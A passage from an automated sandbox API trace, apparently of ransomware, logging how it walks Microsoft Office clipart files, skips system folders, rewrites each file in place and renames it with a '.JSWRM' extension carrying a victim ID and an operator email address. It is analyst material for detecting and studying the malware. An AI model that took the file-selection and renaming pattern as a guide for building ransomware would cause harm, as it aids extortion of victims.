lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304861.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0304861.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0089.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0089.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304861.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304861.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0304861.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0089.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0089.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0089.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0089.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304861.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.252] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11512) returned 1 [0089.252] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2cf0) returned 0x24d210 [0089.252] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2cf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2cf0, lpOverlapped=0x0) returned 1 [0089.254] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.254] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2cf0, lpOverlapped=0x0) returned 1 [0089.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.255] CloseHandle (hObject=0x314) returned 1 [0089.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0089.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0089.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0089.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0089.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0089.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0089.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.255] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304861.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304861.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304861.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0089.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0089.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0089.259] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f8e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0304875.WMF", cAlternateFileName="")) returned 1 [0089.259] lstrcmpiW (lpString1="J0304875.WMF", lpString2=".") returned 1 [0089.259] lstrcmpiW (lpString1="J0304875.WMF", lpString2="..") returned 1 [0089.259] lstrcmpiW (lpString1="J0304875.WMF", lpString2="...") returned 1 [0089.259] lstrcmpiW (lpString1="J0304875.WMF", lpString2="windows") returned -1 [0089.259] lstrcmpiW (lpString1="J0304875.WMF", lpString2="recovery") returned -1 [0089.259] lstrcmpiW (lpString1="J0304875.WMF", lpString2="perflogs") returned -1 [0089.259] lstrcmpiW (lpString1="J0304875.WMF", lpString2="documents and settings") returned 1 [0089.259] lstrcmpiW (lpString1="J0304875.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.259] lstrcmpiW (lpString1="J0304875.WMF", lpString2="system volume information") returned -1 [0089.259] lstrcmpiW (lpString1="J0304875.WMF", lpString2="msocache") returned -1 [0089.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0089.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304875.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304875.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0304875.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0089.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304875.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0304875.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0304875.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0089.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0089.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0089.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304875.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304875.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.261] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20366) returned 1 [0089.261] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4f80) returned 0x24d210 [0089.261] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4f80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4f80, lpOverlapped=0x0) returned 1 [0089.263] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.263] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4f80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4f80, lpOverlapped=0x0) returned 1 [0089.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.264] CloseHandle (hObject=0x314) returned 1 [0089.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0089.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0089.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0089.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0089.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0089.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0089.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.264] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304875.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304875.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304875.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304875.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0089.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0089.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0089.265] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x29c4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0309480.JPG", cAlternateFileName="")) returned 1 [0089.265] lstrcmpiW (lpString1="J0309480.JPG", lpString2=".") returned 1 [0089.265] lstrcmpiW (lpString1="J0309480.JPG", lpString2="..") returned 1 [0089.265] lstrcmpiW (lpString1="J0309480.JPG", lpString2="...") returned 1 [0089.265] lstrcmpiW (lpString1="J0309480.JPG", lpString2="windows") returned -1 [0089.265] lstrcmpiW (lpString1="J0309480.JPG", lpString2="recovery") returned -1 [0089.265] lstrcmpiW (lpString1="J0309480.JPG", lpString2="perflogs") returned -1 [0089.265] lstrcmpiW (lpString1="J0309480.JPG", lpString2="documents and settings") returned 1 [0089.265] lstrcmpiW (lpString1="J0309480.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.265] lstrcmpiW (lpString1="J0309480.JPG", lpString2="system volume information") returned -1 [0089.265] lstrcmpiW (lpString1="J0309480.JPG", lpString2="msocache") returned -1 [0089.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0089.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309480.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309480.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309480.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0089.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0089.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309480.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309480.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309480.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0089.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0089.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0089.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0089.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309480.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309480.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.266] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10692) returned 1 [0089.266] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29c0) returned 0x24d210 [0089.266] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x29c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x29c0, lpOverlapped=0x0) returned 1 [0089.269] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.269] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x29c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x29c0, lpOverlapped=0x0) returned 1 [0089.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.269] CloseHandle (hObject=0x314) returned 1 [0089.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0089.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0089.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0089.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0089.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0089.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0089.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.269] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309480.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309480.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309480.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309480.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0089.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0089.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0089.270] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf406dcf, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf406dcf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x544c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0309567.JPG", cAlternateFileName="")) returned 1 [0089.270] lstrcmpiW (lpString1="J0309567.JPG", lpString2=".") returned 1 [0089.270] lstrcmpiW (lpString1="J0309567.JPG", lpString2="..") returned 1 [0089.270] lstrcmpiW (lpString1="J0309567.JPG", lpString2="...") returned 1 [0089.270] lstrcmpiW (lpString1="J0309567.JPG", lpString2="windows") returned -1 [0089.270] lstrcmpiW (lpString1="J0309567.JPG", lpString2="recovery") returned -1 [0089.270] lstrcmpiW (lpString1="J0309567.JPG", lpString2="perflogs") returned -1 [0089.270] lstrcmpiW (lpString1="J0309567.JPG", lpString2="documents and settings") returned 1 [0089.270] lstrcmpiW (lpString1="J0309567.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.270] lstrcmpiW (lpString1="J0309567.JPG", lpString2="system volume information") returned -1 [0089.270] lstrcmpiW (lpString1="J0309567.JPG", lpString2="msocache") returned -1 [0089.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0089.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309567.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309567.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309567.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0089.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0089.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309567.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309567.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309567.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0089.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0089.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0089.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0089.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309567.JPG" (normalized: "c:\\program files\\microsoft 